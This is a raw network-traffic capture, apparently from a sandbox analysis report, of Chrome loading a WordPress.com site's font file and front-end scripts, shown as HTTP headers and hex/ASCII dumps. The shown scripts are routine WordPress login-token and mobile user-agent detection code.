                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 28 7b 74 79 70 65 3a 22 6c 6f 67 69 6e 4d 65 73 73 61 67 65 22 2c 64 61 74 61 3a 7b 65 76 65 6e 74 3a 22 6c 6f 67 69 6e 22 2c 73 75 63 63 65 73 73 3a 74 72 75 65 2c 74 79 70 65 3a 22 72 6c 74 22 2c 74 6f 6b 65 6e 3a 74 2c 73 6f 75 72 63 65 4f 72 69 67 69 6e 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 7d 7d 29 2c 6e 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 72 6c 74 49 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 74 7d 3b 77 69 6e 64 6f 77 2e 72 6c 74 47 65 74 54 6f 6b 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 7d 3b 77 69 6e 64 6f 77 2e 72 6c 74 41 64 64 49 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65
                                                                                                                                                                                                                                                Data Ascii: ({type:"loginMessage",data:{event:"login",success:true,type:"rlt",token:t,sourceOrigin:window.location.origin}}),n)}catch(t){return}}};window.rltIsAuthenticated=function(){return!!t};window.rltGetToken=function(){return t};window.rltAddInitializationListe
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC223INData Raw: 65 67 69 73 74 65 72 22 29 7b 69 66 28 63 28 6e 2e 6f 72 69 67 69 6e 29 29 7b 6f 2e 70 75 73 68 28 5b 6e 2e 6f 72 69 67 69 6e 2c 6e 2e 73 6f 75 72 63 65 5d 29 3b 69 66 28 74 29 7b 72 6c 74 49 6e 6a 65 63 74 54 6f 6b 65 6e 28 74 2c 6e 2e 73 6f 75 72 63 65 2c 6e 2e 6f 72 69 67 69 6e 29 7d 7d 7d 7d 7d 29 3b 69 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 74 29 7d 29 3b 69 3d 5b 5d 3b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 74 79 70 65 3a 22 72 6c 74 4d 65 73 73 61 67 65 22 2c 64 61 74 61 3a 7b 65 76 65 6e 74 3a 22 72 65 67 69 73 74 65 72 22 7d 7d 2c 22 2a 22 29 3b 72 3d 74 72 75 65 7d 7d 29 28 29 3b
                                                                                                                                                                                                                                                Data Ascii: egister"){if(c(n.origin)){o.push([n.origin,n.source]);if(t){rltInjectToken(t,n.source,n.origin)}}}}});i.forEach(function(e){e(t)});i=[];window.parent.postMessage({type:"rltMessage",data:{event:"register"}},"*");r=true}})();


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.1149752192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:34 UTC639OUTGET /wp-content/themes/pub/fewer/assets/fonts/epilogue_300.ttf HTTP/1.1
                                                                                                                                                                                                                                                Host: s2.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC507INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:34 GMT
                                                                                                                                                                                                                                                Content-Type: application/font-ttf
                                                                                                                                                                                                                                                Content-Length: 104256
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Tue, 04 Jul 2023 12:39:46 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "64a41312-19740"
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Expires: Fri, 04 Apr 2025 18:15:25 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca BYPASS
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC862INData Raw: 00 01 00 00 00 10 01 00 00 04 00 00 47 44 45 46 7c cb 84 86 00 01 21 cc 00 00 01 50 47 50 4f 53 c2 c3 db cf 00 01 23 1c 00 00 59 4a 47 53 55 42 3b 34 8a 97 00 01 7c 68 00 00 1a 94 4f 53 2f 32 84 62 3b 31 00 00 e8 f4 00 00 00 60 53 54 41 54 e4 54 cc 22 00 01 96 fc 00 00 00 44 63 6d 61 70 96 8a eb a6 00 00 e9 54 00 00 07 e4 67 61 73 70 00 00 00 10 00 01 21 c4 00 00 00 08 67 6c 79 66 97 88 15 1d 00 00 01 0c 00 00 cc a6 68 65 61 64 1e 72 0a 63 00 00 d6 c8 00 00 00 36 68 68 65 61 0d 4f 07 51 00 00 e8 d0 00 00 00 24 68 6d 74 78 2e 52 0a 59 00 00 d7 00 00 00 11 ce 6c 6f 63 61 1b e9 ea 2e 00 00 cd d4 00 00 08 f2 6d 61 78 70 04 88 00 de 00 00 cd b4 00 00 00 20 6e 61 6d 65 80 21 a7 34 00 00 f1 40 00 00 04 8c 70 6f 73 74 58 cc c6 15 00 00 f5 cc 00 00 2b f7 70 72 65
                                                                                                                                                                                                                                                Data Ascii: GDEF|!PGPOS#YJGSUB;4|hOS/2b;1`STATT"DcmapTgasp!glyfheadrc6hheaOQ$hmtx.RYloca.maxp name!4@postX+pre
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 04 40 00 a6 00 f1 ff ff 00 5a 00 00 04 5c 06 ba 06 26 00 01 00 00 00 07 04 48 00 a9 00 00 ff ff 00 5a 00 00 04 5c 06 bd 06 26 00 01 00 00 00 07 04 2a 00 fb 00 00 ff ff 00 5a 00 00 04 5c 07 70 06 26 00 01 00 00 00 27 04 2a 00 fb 00 00 00 07 04 42 00 e6 00 ec ff ff 00 5a fe c1 04 5c 05 c8 06 26 00 01 00 00 00 07 04 50 01 76 00 00 ff ff 00 5a 00 00 04 5c 06 b9 06 26 00 01 00 00 00 07 04 30 00 a3 00 00 ff ff 00 5a 00 00 04 5c 06 d3 06 26 00 01 00 00 00 07 04 46 00 cb 00 00 ff ff 00 5a 00 00 04 5c 06 98 06 26 00 01 00 00 00 07 04 4a 01 25 00 00 ff ff 00 5a 00 00 04 5c 06 84 06 26 00 01 00 00 00 07 04 42 00 e6 00 00 ff ff 00 5a fe 5c 04 5c 05 c8 06 26 00 01 00 00 00 07 04 58 02 90 00 00 ff ff 00 5a 00 00 04 5c 07 5c 06 26 00 01 00 00 00 07 04 3e 01 06 00 00 ff
                                                                                                                                                                                                                                                Data Ascii: @Z\&HZ\&*Z\p&'*BZ\&PvZ\&0Z\&FZ\&J%Z\&BZ\\&XZ\\&>
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 01 00 98 00 00 03 a0 05 c3 00 0f 00 00 53 37 11 27 21 15 21 37 11 27 21 15 21 11 21 15 dc 38 20 02 51 fd af 20 38 02 c4 fc f8 03 08 05 56 45 fd 54 2c 6e 2c fd 4f 45 6d 05 c3 6d ff ff 00 98 00 00 03 a0 06 b9 06 26 00 2e 00 00 00 07 04 32 01 5d 00 00 ff ff 00 98 00 00 03 a0 06 a0 06 26 00 2e 00 00 00 07 04 3c 00 f0 00 00 ff ff 00 98 00 00 03 a0 06 b4 06 26 00 2e 00 00 00 06 04 3a 7f 00 ff ff 00 98 fe 54 03 a0 05 c3 06 26 00 2e 00 00 00 07 04 56 00 b9 00 00 ff ff 00 98 fe 54 03 a0 06 a0 06 26 00 2e 00 00 00 27 04 56 00 b9 00 00 00 07 04 3c 00 f0 00 00 ff ff 00 98 00 00 03 a0 06 b4 06 26 00 2e 00 00 00 06 04 37 7f 00 ff ff 00 98 00 00 04 1d 07 46 06 26 00 2e 00 00 00 06 04 73 d0 00 ff ff 00 98 fe c1 03 a0 06 b4 06 26 00 2e 00 00 00 27 04 50 01 59 00 00 00 06
                                                                                                                                                                                                                                                Data Ascii: S7'!!7'!!!8 Q 8VET,n,OEmm&.2]&.<&.:T&.VT&.'V<&.7F&.s&.'PY
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 38 04 4f 5f 5f 01 74 fa 3d 02 e6 3e 3e fd 1a 05 c3 fd 12 41 41 02 ee 00 ff ff 00 98 fe c6 04 4d 05 c3 06 26 00 51 00 00 00 07 04 5a 01 02 00 00 ff ff 00 98 00 00 04 4d 06 b4 06 26 00 51 00 00 00 07 04 37 00 c9 00 00 ff ff 00 98 fe c1 04 4d 05 c3 06 26 00 51 00 00 00 07 04 50 01 8e 00 00 00 01 00 a7 00 00 01 21 05 c3 00 03 00 00 73 11 33 11 a7 7a 05 c3 fa 3d 00 01 00 82 00 00 03 82 05 c3 00 0f 00 00 73 35 21 07 11 17 21 35 21 15 21 37 11 27 21 15 82 01 7a 38 38 fe 86 03 00 fe 86 38 38 01 7a 6d 38 05 59 38 6d 6d 38 fa a7 38 6d 00 ff ff 00 7f 00 00 02 1d 06 b9 06 26 00 56 00 00 00 06 04 32 1b 00 ff ff 00 82 00 00 03 82 06 b9 06 26 00 57 00 00 00 07 04 32 01 39 00 00 ff ff 00 05 00 00 01 c5 06 a0 06 26 00 56 00 00 00 06 04 3c ae 00 ff ff 00 82 00 00 03 82 06
                                                                                                                                                                                                                                                Data Ascii: 8O__t=>>AAM&QZM&Q7M&QP!s3z=s5!!5!!7'!z8888zm8Y8mm88m&V2&W29&V<
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 5d fe 37 54 01 c8 fc 50 05 c3 fa 65 45 6d 00 00 01 00 aa 00 00 05 77 05 c3 00 0f 00 00 41 33 11 23 11 17 01 23 01 37 11 23 11 33 01 23 04 a3 d4 76 04 fe 66 b4 fe 65 04 76 d4 01 94 04 05 c3 fa 3d 05 60 02 fa a2 05 5f 02 fa 9f 05 c3 fa 9c ff ff 00 aa fe c1 05 77 05 c3 06 26 00 85 00 00 00 07 04 50 02 27 00 00 00 01 00 98 00 00 04 82 05 c3 00 0b 00 00 61 23 11 33 01 07 11 33 11 23 01 37 01 11 79 ca 02 b2 0b 79 cd fd 50 0c 05 c3 fa 85 06 05 81 fa 3d 05 79 06 ff ff 00 98 ff ed 08 ab 05 c3 04 26 00 87 00 00 00 07 00 76 05 1a 00 00 ff ff 00 98 00 00 04 82 06 b9 06 26 00 87 00 00 00 07 04 32 01 c9 00 00 ff ff 00 98 00 00 04 82 06 b4 06 26 00 87 00 00 00 07 04 3a 00 eb 00 00 ff ff 00 98 fe 50 04 82 05 c3 06 26 00 87 00 00 00 07 04 54 01 a3 00 00 ff ff 00 98 00 00
                                                                                                                                                                                                                                                Data Ascii: ]7TPeEmwA3##7#3#vfev=`_w&P'a#33#7yyP=y&v&2&:P&T
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 06 98 06 26 00 93 00 00 00 07 04 4a 01 73 00 00 ff ff 00 6a ff ed 04 eb 06 84 06 26 00 93 00 00 00 07 04 42 01 33 00 00 ff ff 00 6a ff ed 04 eb 07 7a 06 26 00 93 00 00 00 27 04 42 01 33 00 00 00 07 04 32 01 e0 00 c1 ff ff 00 6a ff ed 04 eb 07 7a 06 26 00 93 00 00 00 27 04 42 01 33 00 00 00 07 04 30 00 f1 00 c1 00 03 00 6a fe 84 04 eb 05 d3 00 16 00 2a 00 3a 00 00 41 15 06 06 23 22 26 26 35 34 36 36 37 33 0e 02 15 14 16 33 32 36 03 22 26 26 02 35 34 12 36 36 33 32 16 16 12 15 14 02 06 06 27 32 36 12 35 34 02 26 23 22 06 02 15 14 12 16 03 8e 13 32 18 30 50 2f 3c 5a 2b 4b 26 58 3e 38 30 14 2f d3 7e d2 9b 55 55 9b d3 7d 7e d3 9b 55 55 9b d3 7e 85 cb 73 74 cb 84 83 cc 74 74 cc fe d2 47 03 04 1d 40 33 32 65 5c 21 22 5c 5f 28 2e 2c 05 01 1f 67 c3 01 1a b2 b3 01
                                                                                                                                                                                                                                                Data Ascii: &Jsj&B3jz&'B32jz&'B30j*:A#"&&546673326"&&546632'2654&#"20P/<Z+K&X>80/~UU}~UU~stttG@32e\!"\_(.,g
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 00 04 1f 05 c3 00 0d 00 19 00 1d 00 00 41 32 16 15 14 0e 02 23 21 37 11 23 11 01 32 36 36 35 34 26 23 21 37 11 27 05 33 01 23 02 84 c1 da 40 6f 8d 4d fe 55 27 7a 01 ff 42 79 4d ad 93 fe 8e 25 24 01 8c 7b 01 0e 80 05 c3 ce c5 6d 9f 68 32 29 fd 4d 05 c3 fd 32 44 8a 69 9b 91 34 fd 37 32 3e fd 49 00 ff ff 00 98 00 00 04 0b 06 b9 06 26 00 ba 00 00 00 07 04 32 01 5a 00 00 ff ff 00 98 00 00 04 1f 06 b9 06 26 00 bb 00 00 00 07 04 32 01 67 00 00 ff ff 00 98 00 00 04 0b 06 b4 06 26 00 ba 00 00 00 06 04 3a 7b 00 ff ff 00 98 00 00 04 1f 06 b4 06 26 00 bb 00 00 00 07 04 3a 00 88 00 00 ff ff 00 98 fe 50 04 0b 05 c3 06 26 00 ba 00 00 00 07 04 54 01 5f 00 00 ff ff 00 98 fe 50 04 1f 05 c3 06 26 00 bb 00 00 00 07 04 54 01 44 00 00 ff ff 00 98 00 00 04 0b 06 ba 06 26 00 ba
                                                                                                                                                                                                                                                Data Ascii: A2#!7#26654&#!7'3#@oMU'zByM%${mh2)M2Di472>I&2Z&2g&:{&:P&T_P&TD&
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: b2 00 00 01 00 6a ff f5 04 5b 05 cc 00 32 00 00 45 22 2e 02 35 34 34 35 21 15 21 37 14 14 15 14 1e 02 33 32 3e 02 35 34 2e 02 23 22 0e 02 15 23 3e 03 33 32 16 16 12 15 14 02 06 06 02 57 7b b9 7c 3d 03 8d fc e3 0c 2b 59 8c 61 68 94 5e 2b 2f 5f 91 62 62 8c 58 2b 79 02 3e 7b b6 79 7b be 83 44 41 81 c1 0b 6d c0 fe 92 16 28 0a 6f 29 08 16 06 6c c8 9c 5a 64 b0 e7 82 93 ea a5 56 4a 73 78 2e 46 a2 90 5c 67 c2 fe ec ac 9a fe f1 d0 75 00 00 01 00 5a 00 00 03 eb 05 c3 00 09 00 00 41 21 37 11 23 11 17 21 35 21 03 eb fe 57 1e 7b 24 fe 51 03 91 05 56 45 fa 65 05 9b 45 6d 00 02 00 5a 00 00 03 eb 05 c3 00 03 00 0d 00 00 53 35 21 15 13 21 37 11 23 11 17 21 35 21 cc 02 ad 72 fe 57 1e 7b 24 fe 51 03 91 02 c2 40 40 02 94 45 fa 65 05 9b 45 6d ff ff 00 5a 00 00 03 eb 06 b4 06
                                                                                                                                                                                                                                                Data Ascii: j[2E".5445!!732>54.#"#>32W{|=+Yah^+/_bbX+y>{y{DAm(o)lZdVJsx.F\guZA!7#!5!W{$QVEeEmZS5!!7#!5!rW{$Q@@EeEmZ
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 6a fa 33 00 01 00 5f 00 00 06 30 05 c3 00 0f 00 00 61 03 33 13 27 01 33 01 07 13 33 03 23 01 33 01 01 5c fd 80 e2 14 01 49 a2 01 49 14 e2 81 ff bb fe c9 10 fe c8 05 c3 fa 78 01 05 87 fa 79 01 05 88 fa 3d 05 55 fa ab 00 ff ff 00 5f 00 00 06 30 06 b9 06 26 00 fb 00 00 00 07 04 32 02 82 00 00 ff ff 00 5f 00 00 06 30 06 b4 06 26 00 fb 00 00 00 07 04 37 01 a3 00 00 ff ff 00 5f 00 00 06 30 06 bd 06 26 00 fb 00 00 00 07 04 2a 01 eb 00 00 ff ff 00 5f 00 00 06 30 06 b9 06 26 00 fb 00 00 00 07 04 30 01 93 00 00 00 01 00 42 00 00 04 3d 05 c3 00 0f 00 00 41 07 01 33 01 23 01 33 01 27 01 23 01 33 01 23 02 18 01 fe 37 8b 01 8f 51 01 8c 8b fe 3b 01 01 d5 8c fe 64 55 fe 63 8b 03 0c 65 03 1c fd 3b 02 c5 fc e4 65 fc f4 02 b6 fd 4a 00 01 00 5a 00 00 03 fd 05 c3 00 09 00 00
                                                                                                                                                                                                                                                Data Ascii: j3_0a3'33#3\IIxy=U_0&2_0&7_0&*_0&0B=A3#3'#3#7Q;dUce;eJZ
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 00 7a ff ed 04 65 05 c3 06 26 01 10 00 00 00 07 04 36 00 ec 00 00 ff ff 00 84 ff ed 04 59 06 85 06 26 01 0f 00 00 00 07 04 72 01 1c 00 00 ff ff 00 7a ff ed 04 65 06 85 06 26 01 10 00 00 00 07 04 72 01 38 00 00 ff ff 00 84 fe c2 04 59 05 c3 06 26 01 0f 00 00 00 27 04 4f 01 79 00 00 00 07 04 36 00 d0 00 00 ff ff 00 7a fe c2 04 65 05 c3 06 26 01 10 00 00 00 27 04 4f 01 aa 00 00 00 07 04 36 00 ec 00 00 ff ff 00 84 ff ed 04 59 06 85 06 26 01 0f 00 00 00 07 04 74 01 01 00 00 ff ff 00 7a ff ed 04 65 06 85 06 26 01 10 00 00 00 07 04 74 01 1c 00 00 ff ff 00 84 ff ed 04 59 06 7d 06 26 01 0f 00 00 00 07 04 76 00 d0 00 00 ff ff 00 7a ff ed 04 65 06 7d 06 26 01 10 00 00 00 07 04 76 00 ec 00 00 ff ff 00 84 ff ed 04 59 06 a9 06 26 01 0f 00 00 00 07 04 77 00 d0 00 00 ff
                                                                                                                                                                                                                                                Data Ascii: ze&6Y&rze&r8Y&'Oy6ze&'O6Y&tze&tY}&vze}&vY&w


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                10192.168.2.1149753192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:34 UTC779OUTGET /_static/??-eJx9jtEOgjAMRX/I0egk8mL8FDPmJB1ru7At/D4jAaM+8HhP7rktzFFZ4ew4g09A0mNwqiQ3maEyhfyWxqcTfPWoqBjKgJzAuxyNHbdcdWF4IlvoC4YXWDNJ3Qqf3g4aQj6YtUK0Xg84urT+9QOOxG1fzbEqf7F6D7qfb1p3rb5eOr8AfZ5eQA== HTTP/1.1
                                                                                                                                                                                                                                                Host: s0.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC485INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:34 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 61205
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 17:57:17 GMT
                                                                                                                                                                                                                                                Etag: "675880fd-ef15"
                                                                                                                                                                                                                                                Expires: Wed, 10 Dec 2025 19:33:15 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca BYPASS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC884INData Raw: 28 20 66 75 6e 63 74 69 6f 6e 20 28 20 67 20 29 20 7b 0a 0a 20 20 76 61 72 20 74 20 3d 20 7b 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 57 49 4e 44 4f 57 53 3a 20 27 77 69 6e 64 6f 77 73 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 49 50 48 4f 4e 45 3a 20 27 69 70 68 6f 6e 65 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 49 50 4f 44 3a 20 27 69 70 6f 64 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 49 50 41 44 3a 20 27 69 70 61 64 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 42 4c 41 43 4b 42 45 52 52 59 3a 20 27 62 6c 61 63 6b 62 65 72 72 79 27 2c 0a 20 20 20 20 20 20 50 4c 41 54 46 4f 52 4d 5f 42 4c 41 43 4b 42 45 52 52 59 5f 31 30 3a 20 27 62 6c 61 63 6b 62 65 72 72 79 5f 31 30 27 2c 0a 20 20 20 20 20 20 50 4c 41
                                                                                                                                                                                                                                                Data Ascii: ( function ( g ) { var t = { PLATFORM_WINDOWS: 'windows', PLATFORM_IPHONE: 'iphone', PLATFORM_IPOD: 'ipod', PLATFORM_IPAD: 'ipad', PLATFORM_BLACKBERRY: 'blackberry', PLATFORM_BLACKBERRY_10: 'blackberry_10', PLA
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 20 20 74 2e 67 65 74 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 67 65 74 4d 6f 62 69 6c 65 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 09 63 61 74 63 68 20 28 20 65 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 20 65 20 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 2c 0a 0a 20 20 20 20 20 20 69 6e 69 74 46 6f 72 54 65 73 74 3a 20 66 75 6e 63 74 69 6f 6e 28 20 75 73 65 72 41 67 65 6e 74 20 29 20 7b 0a 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 66 61 6c 73 65
                                                                                                                                                                                                                                                Data Ascii: t.getPlatformName(); t.getMobileUserAgentName(); }catch ( e ) { console.error( e ); } }, initForTest: function( userAgent ) { t.matchedPlatformName = false; t.matchedUserAgentName = false
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 74 2e 69 73 42 6c 61 63 6b 62 65 72 72 79 31 30 28 29 20 29 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 27 62 6c 61 63 6b 62 65 72 72 79 5f 31 30 27 3b 0a 20 20 20 20 20 20 20 20 65 6c 73 65 20 69 66 20 28 20 68 61 73 28 20 27 62 6c 61 63 6b 62 65 72 72 79 27 20 29 20 29 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 27 62 6c 61 63 6b 62 65 72 72 79 27 3b 0a 20 20 20 20 20 20 20 20 65 6c 73 65 20 69 66 20 28 20 74 2e 69 73 42 6c 61 63 6b 62 65 72 72 79 54 61 62 6c 65 74 28 29 20 29 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 27 62 6c 61 63 6b 62 65 72 72 79 5f 74 61 62
                                                                                                                                                                                                                                                Data Ascii: t.isBlackberry10() ) t.matchedUserAgentName = 'blackberry_10'; else if ( has( 'blackberry' ) ) t.matchedUserAgentName = 'blackberry'; else if ( t.isBlackberryTablet() ) t.matchedUserAgentName = 'blackberry_tab
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 20 3d 20 27 69 70 61 64 2d 75 6e 6b 6e 6f 77 6e 27 3b 0a 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3b 0a 20 20 20 20 20 20 7d 2c 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 54 68 69 73 20 6d 65 74 68 6f 64 20 64 65 74 65 63 74 73 20 74 68 65 20 6d 6f 62 69 6c 65 20 70 6c 61 74 66 6f 72 6d 20 6e 61 6d 65 2e 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 67 65 74 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 74 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 21 3d 3d 20 66 61 6c 73
                                                                                                                                                                                                                                                Data Ascii: t.matchedUserAgentName = 'ipad-unknown'; return t.matchedUserAgentName; }, /** * This method detects the mobile platform name. */ getPlatformName : function() { if ( t.matchedPlatformName !== fals
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 59 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 74 2e 69 73 53 79 6d 62 69 61 6e 50 6c 61 74 66 6f 72 6d 28 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 3d 20 74 2e 50 4c 41 54 46 4f 52 4d 5f 53 59 4d 42 49 41 4e 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 74 2e 69 73 53 79 6d 62 69 61 6e 53 34 30 50 6c 61 74 66 6f 72 6d 28 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 20 3d 20 74 2e 50 4c 41 54 46 4f 52 4d 5f 53 59 4d 42 49 41 4e 5f 53 34 30 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 74 2e 69 73 4a 32 4d 45 50 6c 61 74 66 6f 72 6d 28 29 20 29 20 7b 0a 20 20
                                                                                                                                                                                                                                                Data Ascii: Y; } else if ( t.isSymbianPlatform() ) { t.matchedPlatformName = t.PLATFORM_SYMBIAN; } else if ( t.isSymbianS40Platform() ) { t.matchedPlatformName = t.PLATFORM_SYMBIAN_S40; } else if ( t.isJ2MEPlatform() ) {
